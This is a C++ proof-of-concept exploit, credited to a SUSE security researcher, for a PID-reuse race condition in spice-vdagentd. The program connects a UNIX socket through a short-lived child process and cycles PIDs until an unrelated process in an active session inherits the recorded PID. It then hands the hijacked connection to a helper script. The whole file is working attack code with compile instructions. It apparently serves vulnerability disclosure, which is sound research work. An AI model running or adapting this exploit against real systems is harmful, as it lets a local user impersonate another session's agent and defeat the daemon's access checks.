/*
 * vim: ts=8 noet sw=8 sts=8 :
 *
 * Author: Matthias Gerstner <matthias.gerstner@suse.com>
 *
 * This program attempts to exploit a race condition in spice-vdagentd
 * regarding the evaluation of SO_PEERCRED PID information in agent_connect()
 * of spice-vdagentd:
 *
 * - it creates a child process that connects an inherited UNIX file
 *   descriptor to spice-vdagentd.
 * - it performs a PID cycle in an attempt to get an unrelated process to
 *   reuse the malicious child PID.
 * - it then reexecutes as `vdagent.py` passing it the malicious UNIX socket
 *   connection.
 *
 * To complete the attack you need to run `create_vdagent_conns.py` in
 * parallel and release it in the end.
 *
 * To compile this program a simple compiler invocation like this should
 * suffice:
 *
 * g++ -std=c++14 socket_pid_attack.cxx -osocket_pid_attack
 *
 * All of this source code is licensed under:
 *
 * ISC License
 *
 * Copyright (c) 2020, SUSE LLC
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

// libstdc++
#include <iostream>
#include <vector>
#include <string>
#include <array>

// UNIX sockets
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

// File handling & friends
#include <unistd.h>
#include <limits.h>
#include <fcntl.h>

#include <sys/wait.h>
#include <sys/eventfd.h>

// errno handling
#include <errno.h>
#include <string.h>

constexpr const char VDAGENT_SOCKET_PATH[] = "/run/spice-vdagentd/spice-vdagent-sock";
constexpr const char VDAGENT[] = "./vdagent.py";

void execV(const std::vector<const char*> &args)
{
	std::cout << "Running '";
	for( auto s: args )
	{
		if(s)
			std::cout << s << " ";
	}
	std::cout << "'" << std::endl;

	(void)execve(args[0], (char*const*)&args[0], environ);

	std::cerr << "failed to exec:" << strerror(errno) << std::endl;
	exit(1);
}

pid_t forkChild()
{
	auto ret = fork();

	if( ret == -1 )
	{
		std::cerr << "fork(): " << strerror(errno) << std::endl;
		exit(1);
	}

	return ret;
}

void execPython(int socket)
{
	const auto socket_str = std::to_string(socket);
	const std::vector<const char*> args({
		VDAGENT, "--socket-fd", socket_str.c_str(), nullptr
	});

	execV(args);
}

void cyclePIDs(pid_t target_pid)
{
	// stop cycling PIDs once we get close to the target_pid. To reproduce
	// the issue this is easier, if random processes come into existence
	// that "steal" our target_pid, while we want explicitly assign the
	// target_pid to a process in an existing interactive session.
	constexpr auto STOP_DISTANCE = 10;

	std::cout << "Target UDS PID = " << target_pid << std::endl;

	/*
	 * for simplicitly don't support corner case situations where we need
	 * to deal with wrap around calculations.
	 */
	if( target_pid <= (STOP_DISTANCE << 1) )
	{
		std::cerr << "corner case situation with target_pid " << target_pid << ": aborting" << std::endl;
		exit(2);
	}

	bool cycling = true;
	pid_t child;

	while( cycling )
	{
		child = forkChild();

		if( child == 0 )
		{
			// unneeded child process, simply exit right away
			_exit(0);
		}
		else if( child < target_pid && child >= (target_pid - STOP_DISTANCE) )
		{
			cycling = false;
		}
		else if( (child & (0x1000 - 1)) == 0 )
		{
			std::cout << "Cycled to PID " << child << std::endl;
		}

		(void)waitpid(child, nullptr, 0);
	}

	std::cout << "Closing in to target_pid " << target_pid << ": Got child PID " << child << std::endl;
}

void checkReplacedProc(const std::string &proc_path, pid_t target_pid)
{
	std::string link;
	link.resize(PATH_MAX);
	auto ret = readlink((proc_path + "/exe").c_str(), &link[0], link.size() - 1);
	if( ret == -1 )
	{
		// failed to read this
		std::cerr << "PID " << target_pid << " now exists, but can't read exe: " << strerror(errno) << std::endl;
	}
	else
	{
		link.resize(ret);
		std::cout << "PID " << target_pid << " now exists, it is running '" << link << "'\n";
	}
}

void waitForPIDReassignment(pid_t target_pid)
{
	std::cout << "Now waiting for " << target_pid << " to get reassigned." << std::endl;

	std::string proc_path("/proc/");
	proc_path += std::to_string(target_pid);

	while( true )
	{
		if( access(proc_path.c_str(), F_OK) == 0 )
		{
			checkReplacedProc(proc_path, target_pid);
			break;
		}

		// busy-wait for 25ms, sadly there's no more efficient way to
		// do this
		usleep(1000 * 25);
	}
}

void waitForConnectChild(pid_t uds_pid, int event)
{
	uint64_t ev_val = 1;
	if( write(event, &ev_val, sizeof(ev_val)) < sizeof(ev_val))
	{
		std::cerr << "write(event): " << strerror(errno) << std::endl;
		exit(1);
	}

	int child_status = 0;

	if( waitpid(uds_pid, &child_status, 0) == -1 )
	{
		std::cerr << "waitpid(): " << strerror(errno) << std::endl;
		exit(1);
	}
	else if( !WIFEXITED(child_status) )
	{
		std::cerr << "child didn't exit normally" << std::endl;
		exit(1);
	}
	else if( WEXITSTATUS(child_status) != 0 )
	{
		std::cerr << "child exited with non-zero exit code" << std::endl;
		exit(1);
	}
}

void childConnectMain(int s, int event)
{
	sockaddr_un addr;
	memset(&addr, 0, sizeof(addr));
	addr.sun_family = AF_UNIX;
	memcpy(addr.sun_path, VDAGENT_SOCKET_PATH, sizeof(VDAGENT_SOCKET_PATH));

	const auto orig_flags = fcntl(s, F_GETFD, 0);

	// set the socket into non-blocking mode to allow an asynchronous
	// connect, which allows us to exit() quicker.
	if( fcntl(s, F_SETFD, orig_flags | O_NONBLOCK) != 0 )
	{
		std::cerr << "fcntl(): " << strerror(errno) << std::endl;
		exit(1);
	}

	// wait until signaled before we connect
	uint64_t ev_val = 0;
	(void)read(event, &ev_val, sizeof(ev_val));

	/**
	  * the kernel will note our current PID for SO_PEERCRED, so connect
	  * wit this PID and exit, freeing the PID for other unrelated
	  * processes to obtain it.
	  * the parent process still shares the UDS file descriptor
	  * and can continue using it once the PID is used by an
	  * unrelated process.
	  **/
	if( connect(s, (sockaddr*)&addr, sizeof(addr)) != 0 )
	{
		if( errno != EINPROGRESS )
		{
			std::cerr << "connect(): " << strerror(errno) << std::endl;
			exit(1);
		}
	}

	if( fcntl(s, F_SETFD, orig_flags) != 0 )
	{
		std::cerr << "fcntl(): " << strerror(errno) << std::endl;
		exit(1);
	}
}

int setupSocket(pid_t &uds_pid, int event)
{
	auto s = socket(AF_UNIX, SOCK_STREAM, 0);

	if(s == -1)
	{
		std::cerr << "socket(): " << strerror(errno) << std::endl;
		exit(1);
	}

	auto child = forkChild();

	if( child == 0 )
	{
		childConnectMain(s, event);
		exit(0);
	}

	// by now the socket should be connected with spice-vdagentd, the now
	// exited child's PID recorded for SO_PEERCRED in the kernel.

	// this is now the PID that we're after to get reassigned by an
	// unrelated process in an active session
	uds_pid = child;

	return s;
}


int main()
{
	// this will be the PID that we need to get replaced by an unrelated
	// process in an active session.
	pid_t uds_pid = -1;

	if( access(VDAGENT, F_OK) != 0 )
	{
		std::cerr << "error: " << VDAGENT << " program is required to run this attack" << std::endl;
		return 1;
	}

	// event file descriptor to signal child process when to connect the socket
	int event = eventfd(0, 0);

	if(event == -1)
	{
		std::cerr << "eventfd(): " << strerror(errno) << std::endl;
		return 1;
	}

	auto s = setupSocket(uds_pid, event);

	/*
	 * now cycle the PIDs used by the kernel to allow an unrelated process
	 * to receive the PID recorded in our UNIX domain socket.
	 */
	cyclePIDs(uds_pid);

	// only now let the child connect and exit(), to reduce the time
	// window between connect() and PID reuse.
	waitForConnectChild(uds_pid, event);

	close(event);

	waitForPIDReassignment(uds_pid);

	execPython(s);

	return 0;
}
